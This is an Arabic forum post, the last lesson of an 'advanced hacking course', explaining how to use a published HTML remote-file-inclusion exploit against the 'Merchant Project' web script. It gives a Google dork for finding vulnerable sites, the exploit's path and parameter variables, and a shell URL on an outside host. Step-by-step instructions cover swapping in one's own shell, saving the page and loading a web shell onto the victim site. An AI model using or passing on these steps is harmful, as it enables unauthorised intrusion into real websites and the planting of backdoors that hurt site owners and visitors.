أخباركمـ


نكمل علي بركة الله

طبعا كلنا او البعض منا يعرف عن انواع من الثغرات

لكن ما يعرفها كلها

يعرف ان فيه فايل انكلود وسكيول انجاكشن وكوماند اكسزيشان ...

المهمـ حتي نقدر نفهمـ كويس نستغل اي ثغرة تقابلنا

بعض اللي اكتشفوا هذة الثغرات استعملوا لغات برمجيه مثا html ..... php .... perl

حتي يطبقون عن طريقها

بشرح اليومـ استغلال ثغرات <html>

اي ثغرة تلقي بأول الصفحه هذا الكود <html> تعرف انها ثغرة من نوع الهتمل

ولو درست لغة الات تي ام ال قبل كدا بتفهمـ كويس ؟

الثغرة الموجودة بالميلورمـ

http://www.milw0rm.com/exploits/3818

راح اشرح التطبيق عليها ..
----------

<html>
بداية الصفحه

--------

Remote File Include Exploit
النوع

----

Script Name: 2005-2006 The Merchant Project


-----------

كود:
Dork       : http://www.google.com.tr/search?q=%2...&start=30&sa=N
كود البحث

---------

------------
كود:
//Basic exploit,but any time : (
هذا اهمـ شئ وهو ثوابت الكود

الملفات اللي بنستغل من خلالها او اللي بيها الخطأ
---------
كود:
var path="/help"
كود البحث

---------

------------
كود:
//Basic exploit,but any time : (
هذا اهمـ شئ وهو ثوابت الكود

الملفات اللي بنستغل من خلالها او اللي بيها الخطأ
كود:
var path="/help"
مجلد المساعده يحمل الصفحه اللي بيها الثغرة
--------
كود:
var adres="/index.php?" //File name
الصفحة اللي فيها كود التغرة
--------
كود:
var acik ="show=" // Line x
متغير التغرة
--------
كود:
var shell="http://kezzap66345.by.ru/casus.php?" // Shell Script
هنا نضع الشيل بين الاقواس

وللبحث عنوا كنترول f
ctrl+f = shll

----------

اوكـ ما فيه غموض

خطوات العمل
1- تاخد الكود الموجود بالصفحه وتحدد الكل وتنسخوا


2- تغير رابط الشي الي رابط الشيل حقك


3- تحفظوا بأمتداد html


4- نفتح الصفحه بالمتصفح عادي ونضع رابط الموقع المصاب كما بالصورة


واضغطـ اوكـ بيحملكـ الشيل بالصفحه ومبروك عليك



------

وهكذا نكون قد أنهينا الدرس العاشر والأخير من دورة الهكر المتقدمة
آمل أن تكون قد أعجبتكم وأن تكونوا أستفدتم منها ولو بالقليل

بالتوفيق